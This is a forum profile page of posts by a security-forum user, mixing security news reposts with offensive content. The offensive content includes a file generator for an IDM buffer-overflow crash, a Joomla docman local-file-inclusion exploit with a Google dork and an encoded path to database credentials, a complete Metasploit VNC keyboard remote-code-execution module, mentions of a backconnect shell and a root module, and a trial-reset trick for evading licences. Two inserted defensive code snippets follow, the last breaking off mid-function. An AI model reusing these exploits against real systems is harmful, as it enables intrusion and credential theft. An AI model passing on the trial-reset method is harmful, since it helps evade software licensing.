Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. For most of the programs I tested the method on (Avast, Kaspersky, Bitdefender, Malwarebytes and more), I used Revo Uninstaller every time, then deleted the entries from the registry, and it worked.
  2. There are only 3 steps you need to follow.
     1- After the trial period has expired, uninstall the program.
     2- Start -> search -> (type) regedit + ENTER ... HKEY_CURRENT_USER -> Software -> find the program's folder (e.g. Avast Software) -> right click -> delete
     3- Reinstall the program, choose the trial option, and that's all.
     P.S.: This method is perfectly legal and can be used as many times as you need. Rather than messing around with useless cracks, you are better off sacrificing 10 minutes of your time to reinstall the program.
     Edit: The method may not work for some programs!
     Source: Aerosol @ Romanian Security Team.
  3. #!/usr/bin/env python
     # Title : Internet Download Manager - Crash Proof Of Concept
     # Affected Versions: All Version
     # Founder : InternetDownloadManager
     # Tested on Windows 7 / Server 2008
     #
     #
     # Author : Mohammad Reza Espargham
     # Linkedin : https://ir.linkedin.com/in/rezasp
     # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
     # Website : www.reza.es
     # Twitter : https://twitter.com/rezesp
     # FaceBook : https://www.facebook.com/mohammadreza.espargham
     #
     #
     # downlWithIDM64.dll Exploit
     #
     #
     # 1 . run python code : python crash.py
     # 2 . open "IDM"
     # 3 . Tasks --> Import --> From IDM export file
     # 4 . select r3z4.ief
     # 5 . Crashed

     hdr = "<" #start syntax
     hcr = "ftp://" #pro
     crash = "\x41"*1992999 #B0F
     exp = hdr+hcr+crash+hdr+hcr+crash
     file = open("r3z4.ief", "w")
     file.write(exp)
     file.close()

     Source
  4. # Title: Notepad++ - Crash
     # Date: 10/07/2015
     # Author: Rahul Pratap Singh (@0x62626262)
     # Vendor Homepage: https://notepad-plus-plus.org
     # Download: https://notepad-plus-plus.org/download/v6.7.3.html
     # Version: v6.7.3
     # Tested on: Windows_XP_x86 & Windows_7_x86

     Incorrect theme file parsing, that leads to crash.

     - Create a .xml file with numerous "A" (around 1000) in it and save as test.xml
     - Go to this directory in windows "/appdata/roaming/notepad++/themes/" and paste above test.xml file in this theme folder and restart notepad++
     - Now start notepad++ and in menu tab, go in settings and then select style configurator and now select test file in theme select option
     - Now hit "save and close" button, it will crash with an error message

     Thanks
     Rahul Pratap Singh

     Source
  5. Upgrade Workstation, Player and Horizon View client at your leisure, or risk internal attacks VMware's security SNAFU email list has delivered news of a new issue in VMware Workstation, Player and Horizon View Client. The missive says “VMware Workstation, Player and Horizon View Client for Windows do not set a discretionary access control list (DACL) for one of their processes. This may allow a local attacker to elevate their privileges and execute code in the security context of the affected process.” Allowing someone inside the firewall to do that doesn't sound like a good idea at all, so VMware has done the proper thing and coded fixes in the form of point upgrades to the affected products, namely Workstation 10.x and 11.x, Player 7.x and 6.x, plus Horizon View Client 5.x. The advisory's name is VMSA-2015-0005, with the latter quad indicating it is the fifth time this year VMware's had to make something right in a hurry. That's not a terrible record for a company with a decent portfolio of products, although the fact that three of the five impact Workstation may raise eyebrows. The good news for users of VMware's desktop hypervisor for Windows is that it looks to have a substantial refresh on the horizon (pardon the pun), or at least enough of a refresh to justify a change in naming convention. Source
  6. Whoops, sorry, did we not make that clear - Google Uninstalling the Google Photos app from your Android device will not safeguard your pictures from being slurped up by Google, it turns out. Picture Nashville Business Journal journo David Arnott's horror upon discovering that the advertising giant had been collecting private photographs he had taken of his wife and daughter. "The problem was," he wrote, "I'd deleted all of those pictures, and most distressing, I didn't even have the Google Photos app on my phone." Arnott, an assistant news editor at the NBJ, discovered that the uploading settings on the Google Photos app are linked to the separate Google Settings app on Android phones, rather than the settings of the native Photos app itself. All that has to be done to turn your Android device "into a stealth Google Photos uploader" is to "turn on the backup sync, then uninstall the app," Arnott writes. After reaching out to Google, and after reaching someone on the phone and describing the issue, Arnott was told to wait for a comment. "Several hours later, I received a terse email that said, 'The backup was as intended.' If I want to stop it from happening, I was told I'd have to change settings in Google Play Services." From sexting images, obtained by Google without users' knowledge - GCHQ style - through to just average passers by, captured in a photograph without their knowledge and subjected to Google's facial recognition technology, Arnott suggests there are plenty of details within this realm which are worthy of public concern. A spokesperson at Google told The Register: "Some users have uninstalled the Photos app on Android without realising backup as an Android service is still enabled. This is something we are committed to resolving. We are working to make the messaging clearer as well as provide users who uninstall the Photos app an easy way to also disable backup." 
"In the meantime, if you've deleted the Photos app and would like to turn off backup on your Android device, please go to Google Settings, select Google Photos backup and toggle the switch at the top to 'off.'" Source
  7. Adobe has promised to do all it can to improve the security of its much maligned Flash tool, in response to criticisms from the new chief security officer of Facebook and Mozilla blocking the tool from its Firefox browser. The company said in a blog post that it is working hard to fix problems that came to light after data was leaked from the server of Italian surveillance software firm Hacking Team. Adobe went on to say that Flash is widely used and is naturally a target for hackers, but that the firm is confident of maintaining an adequate level of security for the product. "Flash Player is one of the most ubiquitous and widely distributed pieces of software in the world and, as such, is a target of malicious hackers," the blog said. "We are actively working to improve Flash Player security and, as we did in this case, will work to quickly address issues when they are discovered." The comments come after Mozilla took the notable step of blocking Flash from its browser in light of security concerns that came to light in the past 10 days. Mark Schmidt, head of Firefox support at Mozilla, confirmed that all versions of Flash up to the most recent 18.0.0.203 release have been added to the official Mozilla blocklist. This came after incoming Facebook chief security officer Alex Stamos called for Adobe to announce an ‘end-of-life date’ for Flash given the problems it is causing. “Even if it's 18 months from now, one set date is the only way to disentangle the dependencies and upgrade the whole ecosystem at once,” he added. Adobe has issued two major updates for Flash since the flaws were revealed. The first patch fixed the CVE-2015-5119 vulnerability. The firm was soon forced to issue a second patch for two further flaws that were uncovered, termed CVE-2015-5122 and CVE-2015-5123, as explained in a post on its website. "Critical vulnerabilities have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux," it said. 
"Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system." Adobe rates the flaws as critical and firms have been urged to upgrade as soon as possible. The firm also thanked researchers at FireEye and Trend Micro for uncovering the vulnerabilities. The revelations are just the latest information to come to light since the Hacking Team breach. Other data revealed that the FBI is a customer of Hacking Team, and is reported to have spent $775,000 on the firm's software. The revelations from the hack have not come as a huge surprise to those who have criticised Hacking Team in the past, and the firm has been labelled an "enemy of the internet" by Reporters Without Borders. "Hacking Team describes its lawful interception products as 'offensive technology' and has been called into question over deliveries to Morocco and the United Arab Emirates," the organisation said. "The company’s 'Remote Control System', called DaVinci, is able, it says, to break encryption on emails, files and internet telephony protocols." The attackers behind the hack have not yet come to light, but they too were clearly keen to embarrass and discredit Hacking Team, not only releasing the data from its systems but defacing its Twitter account and posting company emails. The firm’s bio on Twitter was changed to read: 'Developing ineffective, easy-to-pwn offensive technology to compromise the operations of the worldwide law enforcement and intelligence communities.' The leaked information allegedly includes contracts the company signed with repressive governments such as in Sudan, Uzbekistan and Russia. Hacking Team had denied ever working with Sudan after a report in 2014 accused it of doing so. Source
  8. Data accidentally made public by Google has revealed that 95 percent of all requests for search results to be removed from its index under the Right to be Forgotten ruling have been made by ordinary people, not celebrities, MPs or criminals. The data, uncovered by The Guardian, is somewhat surprising, as one of the chief arguments made against the Right to be Forgotten is that it could be abused by those in high-profile positions to hide negative stories from their past. However, The Guardian uncovered information in the source code of Google’s Transparency Report showing that the vast majority of the 220,000 requests received up to March 2015 related to everyday people. “These include a woman whose name appeared in prominent news articles after her husband died, another seeking removal of her address, and an individual who contracted HIV a decade ago,” The Guardian reported. Google said that the information was test data being worked on as the company considers the possibility of providing more insight into the nature of the requests it has received. "We’ve always aimed to be as transparent as possible about our Right to be Forgotten decisions. The data The Guardian found was part of a test to figure out how we could best categorise requests," the firm said. "We discontinued that test in March because the data was not reliable enough for publication. We are, however, currently working on ways to improve our transparency reporting." Google has revealed that as of 14 July it has received 283,276 requests to take down information for over one million URLs. The Right to be Forgotten ruling has created much controversy, some arguing that it has effectively made Google the judge and jury when deciding who can have their information made private and who cannot. The BBC has already attempted to keep a list of all the URLs that Google has removed from its listings relating to the broadcaster to help people find out what is being removed. 
"The BBC has decided to make clear to licence fee payers which pages have been removed from Google's search results by publishing this list of links," wrote Neil McIntosh, managing editor at the BBC. Source
  9. Office desktops, RDP servers, Hyper-V systems, all hit

     Microsoft has released fixes for 59 CVE-listed vulnerabilities in its software – including a patch for the elevation-of-privilege flaw in Windows exploited by spyware maker Hacking Team. There's a patch (MS15-065) for a remote-code execution bug in Internet Explorer 11 on Windows 7 and 8.1 that also emerged from the Hacking Team leak. Someone tried to sell details of the hole to the Italian surveillance-ware maker, and although the company declined to buy an exploit, enough information was exchanged in the subsequently leaked emails to reveal the flaw. It's possible there are even more Hacking Team-linked vulnerabilities fixed in this month's Patch Tuesday batch. There's a remote-code execution hole in Redmond's RDP server on Windows 7 and 8, and Server 2012 and Server Core, and also one in SQL server. There's a Hyper-V guest escape.

     This Patch Tuesday has something for everyone:

     MS15-077: The Hacking Team elevation-of-privilege bug in the Windows Adobe Type Manager Font Driver that allows normal programs to gain administrator-level access. The flaw exists in Server 2003 and in Windows Vista and later for desktops and notebooks. The flaw is listed as "important," though the availability of exploit code in the wild should make patching a top priority.
     MS15-065: The usual IE patch, this time with 29 CVE-listed flaws in Internet Explorer, including remote code execution vulnerabilities. The bulletin is listed as a "critical" fix, and includes an update to address the other Hacking Team-related bug.
     MS15-066: A bulletin for remote-code execution in the VBScript Scripting Engine. The bulletin is listed as "critical" for Windows machines running IE 6, 7, and 8. Bo Qu of Palo Alto Networks was credited for discovery.
     MS15-067: A remote-code execution flaw in Remote Desktop Protocol servers running on Windows 7, Windows 8, Server 2012, and Server Core. The bulletin is rated as "critical" with no discovery credit given.
     MS15-068: Two CVE-listed remote-code execution vulnerabilities in Hyper-V for Windows Server 2008, Windows 8/8.1, Server 2012, and Server Core. An application running in a guest application can exploit this bug to run code on the host. Nightmare. The bulletin is listed as "critical," with discovery credit going to Microsoft's Thomas Garner.
     MS15-058: Remote-code execution flaws in SQL server. Listed as an "important" risk with no discovery credit given.
     MS15-069: A pair of remote-code execution vulnerabilities involving RTF and DLL files in Windows Server 2003 and 2012, and Windows Vista to Windows 8.1 RT. The bulletin is listed as "important," with discovery credit going to Haifei Li of McAfee Labs IPS Team and Ashutosh Mehra of HP Zero Day Initiative.
     MS15-070: An update for eight CVE-listed flaws in Microsoft Office 2007, 2010, 2013, and Office for Mac. The bulletin is listed as "important," although it is possible to exploit some of the bugs to execute arbitrary code on a vulnerable PC if a malicious Office file is opened.
     MS15-071: An elevation-of-privilege flaw in Netlogon for Windows Server 2003 and later. The bulletin is listed as "important." Discovery credit was not given.
     MS15-072: An elevation-of-privilege flaw in Windows Graphics Component for Windows Server 2003, 2008, 2012, and Server Core as well as Windows Vista, Windows 7, Windows 8, and Windows RT. The vulnerability is listed as "important" and discovery credit was given to Nicolas Joly.
     MS15-073: Six elevation-of-privilege and information disclosure flaws in the Windows kernel-mode driver for Windows Server 2003 and later and Windows Vista and later. The bulletin is listed as "important," with credit going to Nils Sommer of zytegeist and Matt Tait of Google Project Zero and enSilo.
     MS15-074: An elevation-of-privilege vulnerability in Windows Installer for Server 2003 and later, as well as Vista and later. The bulletin is listed as "important" with credit going to Mariusz Mlynsk of HP Zero Day Initiative.
     MS15-075: Two elevation-of-privilege flaws in Windows OLE for Server 2003 and later and Windows Vista and later. The flaw is listed as "important." Discovery credit was given to Nicolas Joly.
     MS15-076: Elevation-of-privilege flaw in systems after Windows Server 2003 and Windows Vista. The bulletin was listed as "important" with no discovery credit given.

     Get patching before hackers start exploiting them. It is also the final Patch Tuesday for Server 2003. Along with the Microsoft updates, users and admins should also patch or disable Adobe Flash, Acrobat, Reader and Shockwave, as a fresh batch of security fixes are also available for the software today.

     Source
  10. Htcap is a web application analysis tool for detecting communications between javascript and the server. It crawls the target application and maps ajax calls, dynamically inserted scripts, websockets calls, dynamically loaded resources and some interesting elements. The generated report is meant to be a good starting point for a manual web application security audit. Htcap is written in python and uses phantomjs to load pages, injecting a probe that analyzes javascript behaviour. Once injected, the probe overrides native javascript methods in order to intercept communications and DOM changes. It also simulates user interaction by firing all attached events and by filling html inputs. Download
  11. Smalisca is a static code analysis tool for Smali files. Changes: Various updates. Download
  12. find_dns is a tool that scans networks looking for DNS servers.

      #!/usr/bin/env python2
      #
      # ./find_dns.py -l IPs.txt -t 500 -o dnsservers.txt
      #
      # dns-server finder by dash
      #
      #
      #./find_dns.py -l rIP.txt -t 100
      #[*] Found 1001 entries
      #[*] Entries 1001 in queue
      #[*] Running with 100 threads
      #==================================================
      #IP NAME
      #==================================================
      #91.x.x.x (x.info)
      #191.x.x.x (191.x.br)
      #67.x.x.x (name.info)
      #==================================================
      #[*] Done
      #

      import os
      import sys
      import time
      import Queue
      import struct
      import socket
      import random
      import argparse
      import threading

      # result queue shared by all worker threads
      global rQ
      rQ = Queue.Queue()

      def openFile(hostList):
          fr = open(hostList,'r')
          rBuf = fr.readlines()
          fr.close()
          return rBuf

      def openWriteFile(outfile):
          fw = open(outfile,'wb')
          return fw

      def parseDomain(domain):
          # encode "name.tld" as DNS labels: <len>name<len>tld
          do = domain.split('.')
          if len(do) != 2:
              print '[!] Sorry, unknown domain type: %s\nExample:google.com' % (domain)
              return False
          tld = do[1]
          tld_len = struct.pack('>B', len(tld))
          tld_sub = do[0]
          tld_sub_len = struct.pack('>B', len(tld_sub))
          dom_pay = '%c%s%c%s' % (tld_sub_len,tld_sub,tld_len,tld)
          return dom_pay

      def checkDNS(payload,host,resolv,debug,version):
          # settimeout so recv is not block
          rBuf_len = -1
          try:
              s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
              s.settimeout(5)
              s.connect((host,53))
              s.send(payload)
              rBuf = s.recv(1024)
              rBuf_len = len(rBuf)
              name = ''
              # vBuf is printed in debug mode even when -v is not given
              vBuf = ''
              # default we resolve IPs as long as -n is not choosen
              if resolv:
                  try:
                      name = socket.gethostbyaddr(host)[0]
                  except socket.herror,e:
                      pass
              if version:
                  # FEFE packet!
                  ver_req = '\xfe\xfe\x01 \x00\x01\x00\x00\x00\x00\x00\x01\x07version\x04bind\x00\x00\x10\x00\x03\x00\x00)\x10\x00\x00\x00\x00\x00\x00\x00'
                  try:
                      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                      s.settimeout(3)
                      s.connect((host,53))
                      s.send(ver_req)
                      vBuf = s.recv(1024)
                  except socket.error,e:
                      vBuf = ''
                      pass
              if name == '':
                  if debug:
                      print '%s\t%d\t%s\t%s' % (host,rBuf_len,repr(rBuf),repr(vBuf))
                      data = '%s\t%d\t%s\t%s\n' % (host,rBuf_len,repr(rBuf),repr(vBuf))
                  else:
                      print '%s\t%d' % (host,rBuf_len)
                      data = '%s\t%d\n' % (host,rBuf_len)
              else:
                  if debug:
                      print '%s\t(%s) %d\t%s' % (host,name,rBuf_len,repr(rBuf))
                      data = '%s\t(%s) %d\t%s\n' % (host,name,rBuf_len,repr(rBuf))
                  else:
                      print '%s\t(%s) %d' % (host,name,rBuf_len)
                      data = '%s\t(%s) %d\n' % (host,name,rBuf_len)
              rQ.put(data)
          except socket.error,e:
              # print e
              pass
          return

      def run(args):
          """ mighty mighty function """
          if not args.thrCnt:
              thrCnt=50
          else:
              thrCnt = int(args.thrCnt)
          if args.outfile:
              fw = openWriteFile(args.outfile)
          dom_pay = parseDomain(args.domain)
          if dom_pay is False:
              # stop instead of sending a query built from 'False'
              sys.exit(1)
          payload = 'J\x8e\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00%s\x00\x00\x01\x00\x01' % (dom_pay)
          hostList = args.hostList
          q = Queue.Queue()
          rBuf = openFile(hostList)
          print '[*] Found %d entries' % len(rBuf)
          for r in rBuf:
              r = r.rstrip('\n')
              r = r.rstrip('\r')
              q.put(r)
          print '[*] Entries %d in queue' % q.qsize()
          print '[*] Running with %d threads' % thrCnt
          print '='*50
          if args.resolv:
              print 'IP\t\tNAME\tPAYLEN'
          else:
              print 'IP\t\tPAYLEN'
          print '='*50
          thrList = []
          org_qlen = float(q.qsize())
          while True:
              #TODO percents calc
              #qlen = q.qsize()
              #cur_cnt = (qlen / org_qlen) * 100
              #cur_cnt = int(100 - cur_cnt)
              #if cur_cnt % 5 == 0 and cur_cnt != 0:
              #print '='*20+' %d ' % (cur_cnt)+'='*20
              if len(thrList) < thrCnt and q.qsize()>0:
                  # enable random transaction ids
                  if args.randTrans:
                      rd = random.randint(0,65535)
                      rd_pack = struct.pack('>H',rd)
                      payload = '%s%s' % (rd_pack,payload[2:])
                  thrDns = threading.Thread(target = checkDNS, args = (payload,q.get(),args.resolv,args.debug,args.version))
                  thrDns.daemon = True
                  thrDns.start()
                  thrList.append(thrDns)
              # iterate over a copy, the list is modified inside the loop
              for entry in thrList[:]:
                  if entry.isAlive()==False:
                      entry.join()
                      thrList.remove(entry)
              if args.outfile and rQ.qsize()>0:
                  i = rQ.get()
                  data = "%s" % (i)
                  fw.write(data)
                  fw.flush()
              else:
                  if rQ.qsize()>0:
                      rQ.get()
              if q.qsize()==0 and len(thrList) == 0:
                  break
          if args.outfile:
              # write results that were still queued when the last thread ended
              while rQ.qsize()>0:
                  fw.write(rQ.get())
              fw.close()
          print '='*50
          print '[*] Done'
          print '='*50

      def main():
          parser_desc = 'dns server finder, by dash'
          prog_desc = 'find_dns.py'
          parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc)
          parser.add_argument("-l",action='store',required=True,help='host list with ips',dest='hostList')
          parser.add_argument('-t',action='store',required=False,help='thread count', dest='thrCnt')
          parser.add_argument('-o',action='store',required=False,help='write found data to file', dest='outfile')
          parser.add_argument('-n',action='store_false',default=True,required=False,help='do not resolve ips', dest='resolv')
          parser.add_argument('-d',action='store',default='google.com',required=False,help='choose the domain for the dns request', dest='domain')
          parser.add_argument('-r',action='store_false',default=True,required=False,help='deactivate random transaction ids', dest='randTrans')
          parser.add_argument('-v',action='store_true',default=False,required=False,help='grab version from dns server enable debug mode for it! (experimental!)', dest='version')
          parser.add_argument('-V',action='store_true',default=False,required=False,help='print version information', dest='versinfo')
          parser.add_argument('--debug',action='store_true',default=False,required=False,help='debug output', dest='debug')
          args = parser.parse_args()
          # add some more info here sometime
          if args.versinfo:
              # the original printed an undefined name here
              print parser_desc
              sys.exit(23)
          run(args)

      if __name__ == "__main__":
          main()

      Source
  13. AESshell is a backconnect shell for Windows and Unix written in python and uses AES in CBC mode in conjunction with HMAC-SHA256 for secure transport. Written in python but also includes a Windows binary. Download
  14. This module, once loaded, gives the thread/user calling it root instantly without spawning an extra shell. Download
  15. # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
      # CWE: CWE-200(FPD) CWE-98(LFI/LFD)
      # Risk: High
      # Author: Hugo Santiago dos Santos
      # Contact: hugo.s@linuxmail.org
      # Date: 13/07/2015
      # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
      # Google Dork: inurl:"/components/com_docman/dl2.php"

      # Xploit (FPD):
      Get one target and just download with blank parameter:
      http://www.site.com/components/com_docman/dl2.php?archive=0&file=
      In title will occur Full Path Disclosure of server.

      # Xploit (LFD/LFI):
      http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]

      Let's Xploit...
      First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
      ../../../../../../../target/www/configuration.php <= Not Ready
      http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
      And Now we have a configuration file...

      Source
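A defender-side check for the requests this advisory describes, as an added example that is not part of the original post: it scans web access log lines for `dl2.php` requests, decodes the base64 `file` value, and flags blank-parameter probes and traversal paths. The log lines, client addresses and function names are constructed for illustration, and treating a plain relative file name as benign is an assumption.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

DL2_PATH = "/components/com_docman/dl2.php"   # script path from the advisory
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
SENSITIVE_NAMES = ("configuration.php",)      # file the advisory goes after


def decode_file_param(value):
    """Decode the base64 `file` value; return None when it is not base64 text."""
    value = value.strip().replace(" ", "+")   # parse_qs turns '+' into ' '
    value += "=" * (-len(value) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(line):
    """Return a finding dict for a suspicious dl2.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith(DL2_PATH):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "file" not in params:
        return None
    value = params["file"][-1]
    if value == "":
        # blank parameter: the full-path-disclosure request from the advisory
        return {"client": client, "verdict": "fpd-probe", "path": ""}
    path = decode_file_param(value)
    if path is None:
        return {"client": client, "verdict": "not-base64", "path": value}
    normalized = path.replace("\\", "/")
    parts = normalized.split("/")
    absolute = normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized)
    if ".." in parts or absolute:
        verdict = "traversal"
    elif parts[-1].lower() in SENSITIVE_NAMES:
        verdict = "sensitive-file"
    else:
        return None                            # assumed benign: plain relative name
    return {"client": client, "verdict": verdict, "path": path}


def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f is not None]


def b64(path):
    """URL-encoded base64 of a path, used to build the constructed samples."""
    return quote(base64.b64encode(path.encode()).decode())


def sample_request(client, file_value):
    """Build one constructed combined-log line for a dl2.php request."""
    return ('%s - - [13/Jul/2015:10:00:00 +0000] "GET %s?archive=0&file=%s HTTP/1.1" '
            '200 512 "-" "-"' % (client, DL2_PATH, file_value))


# Constructed sample log; the second entry carries the base64 string quoted in the advisory.
SAMPLE_LOG = [
    sample_request("203.0.113.7", ""),
    sample_request("203.0.113.7",
                   "Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=="),
    sample_request("198.51.100.20", b64("manual.pdf")),
    '192.0.2.44 - - [13/Jul/2015:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"',
    sample_request("192.0.2.9", b64("..\\..\\configuration.php")),
    sample_request("192.0.2.9", "not*base64"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("%(client)s\t%(verdict)s\t%(path)r" % finding)
```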
  16. Since nobody from the staff is answering me anyway, could someone TC this. Off:// I'm back, haters. Because of some losers who wasted their time setting dislike bots loose on the forum. Edit:// Just yesterday I got 365 dislikes from a single bot.
  17. ##
      # This module requires Metasploit: http://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      require 'msf/core'
      require 'rex/proto/rfb'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking

        WINDOWS_KEY = "\xff\xeb"
        ENTER_KEY = "\xff\x0d"

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::CmdStager
        include Msf::Exploit::Powershell

        def initialize(info = {})
          super(update_info(info,
            'Name' => 'VNC Keyboard Remote Code Execution',
            'Description' => %q{
              This module exploits VNC servers by sending virtual keyboard keys and executing
              a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
              payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
              and a payload is typed and executed.
            },
            'Author' => [ 'xistence <xistence[at]0x90.nl>' ],
            'Privileged' => false,
            'License' => MSF_LICENSE,
            'Platform' => %w{ win unix },
            'Targets' =>
              [
                [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
                [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
                [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
              ],
            'References' =>
              [
                [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
              ],
            'DisclosureDate' => 'Jul 10 2015',
            'DefaultTarget' => 0))

          register_options(
            [
              Opt::RPORT(5900),
              OptString.new('PASSWORD', [ false, 'The VNC password']),
              OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
            ], self.class)
        end

        def press_key(key)
          keyboard_key = "\x04\x01" # Press key
          keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
          keyboard_key << key # The keyboard key
          # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
          sock.put(keyboard_key)
        end

        def release_key(key)
          keyboard_key = "\x04\x00" # Release key
          keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
          keyboard_key << key # The keyboard key
          # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
          sock.put(keyboard_key)
        end

        def exec_command(command)
          values = command.chars.to_a
          values.each do |value|
            press_key("\x00#{value}")
            release_key("\x00#{value}")
          end
          press_key(ENTER_KEY)
        end

        def start_cmd_prompt
          print_status("#{rhost}:#{rport} - Opening Run command")
          # Pressing and holding windows key for 1 second
          press_key(WINDOWS_KEY)
          Rex.select(nil, nil, nil, 1)
          # Press the "r" key
          press_key("\x00r")
          # Now we can release both keys again
          release_key("\x00r")
          release_key(WINDOWS_KEY)
          # Wait a second to open run command window
          select(nil, nil, nil, 1)
          exec_command('cmd.exe')
          # Wait a second for cmd.exe prompt to open
          Rex.select(nil, nil, nil, 1)
        end

        def exploit
          begin
            alt_key = "\xff\xe9"
            f2_key = "\xff\xbf"
            password = datastore['PASSWORD']

            connect
            vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)

            unless vnc.handshake
              fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
            end

            if password.nil?
              print_status("#{rhost}:#{rport} - Bypass authentication")
              # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
              sock.put("\x10")
            else
              print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
              if vnc.authenticate(password)
                print_status("#{rhost}:#{rport} - Authenticated")
              else
                fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
              end
            end

            # Send shared desktop
            unless vnc.send_client_init
              fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
            end

            if target.name =~ /VBScript CMDStager/
              start_cmd_prompt
              print_status("#{rhost}:#{rport} - Typing and executing payload")
              execute_cmdstager({:flavor => :vbs, :linemax => 8100})
              # Exit the CMD prompt
              exec_command('exit')
            elsif target.name =~ /Powershell/
              start_cmd_prompt
              print_status("#{rhost}:#{rport} - Typing and executing payload")
              command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
              # Execute powershell payload and make sure we exit our CMD prompt
              exec_command("#{command} && exit")
            elsif target.name =~ /Linux/
              print_status("#{rhost}:#{rport} - Opening 'Run Application'")
              # Press the ALT key and hold it for a second
              press_key(alt_key)
              Rex.select(nil, nil, nil, 1)
              # Press F2 to start up "Run application"
              press_key(f2_key)
              # Release ALT + F2
              release_key(alt_key)
              release_key(f2_key)
              # Wait a second for "Run application" to start
              Rex.select(nil, nil, nil, 1)
              # Start a xterm window
              print_status("#{rhost}:#{rport} - Opening xterm")
              exec_command('xterm')
              # Wait a second for "xterm" to start
              Rex.select(nil, nil, nil, 1)
              # Execute our payload and exit (close) the xterm window
              print_status("#{rhost}:#{rport} - Typing and executing payload")
              exec_command("nohup #{payload.encoded} &")
              exec_command('exit')
            end

            print_status("#{rhost}:#{rport} - Waiting for session...")
            (datastore['TIME_WAIT']).times do
              Rex.sleep(1)
              # Success! session is here!
              break if session_created?
            end

          rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
            fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
          ensure
            disconnect
          end
        end

        def execute_command(cmd, opts = {})
          exec_command(cmd)
        end
      end

      Source
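How the key events typed by this module look to a defender, as an added example that is not part of the Metasploit module: a decoder for the client-to-server half of a captured RFB session that skips the other message types, reads each KeyEvent (layout per RFC 6143: type 4, down flag, two padding bytes, 32-bit keysym) and reports the lines typed after a Win+R or Alt+F2 chord. The sample stream is constructed and assumed to start right after ClientInit; all function names are illustrative.

```python
import struct

KEY_EVENT = 4
# Fixed sizes of client-to-server messages (RFC 6143, section 7.5):
# SetPixelFormat, FramebufferUpdateRequest, KeyEvent, PointerEvent.
FIXED_LEN = {0: 20, 3: 10, 4: 8, 5: 6}
KEYSYM_NAMES = {0xFF0D: "Enter", 0xFFEB: "Super_L", 0xFFE9: "Alt_L", 0xFFBF: "F2"}
MODIFIERS = ("Super_L", "Alt_L")
LAUNCHERS = {("Super_L", "r"): "Windows Run dialog",
             ("Alt_L", "F2"): "Run Application dialog"}


def iter_key_events(stream):
    """Yield (down, keysym) for each KeyEvent in a client-to-server RFB stream."""
    pos = 0
    while pos < len(stream):
        mtype = stream[pos]
        if mtype in FIXED_LEN:
            size = FIXED_LEN[mtype]
        elif mtype == 2:                       # SetEncodings: type, pad, u16 count, s32 * count
            if pos + 4 > len(stream):
                return
            size = 4 + 4 * struct.unpack_from(">H", stream, pos + 2)[0]
        elif mtype == 6:                       # ClientCutText: type, 3 pad, u32 length, text
            if pos + 8 > len(stream):
                return
            size = 8 + struct.unpack_from(">I", stream, pos + 4)[0]
        else:
            raise ValueError("unknown message type %d at offset %d" % (mtype, pos))
        if pos + size > len(stream):
            return                             # truncated capture: stop cleanly
        if mtype == KEY_EVENT:
            down, keysym = struct.unpack_from(">BxxI", stream, pos + 1)
            yield bool(down), keysym
        pos += size


def key_name(keysym):
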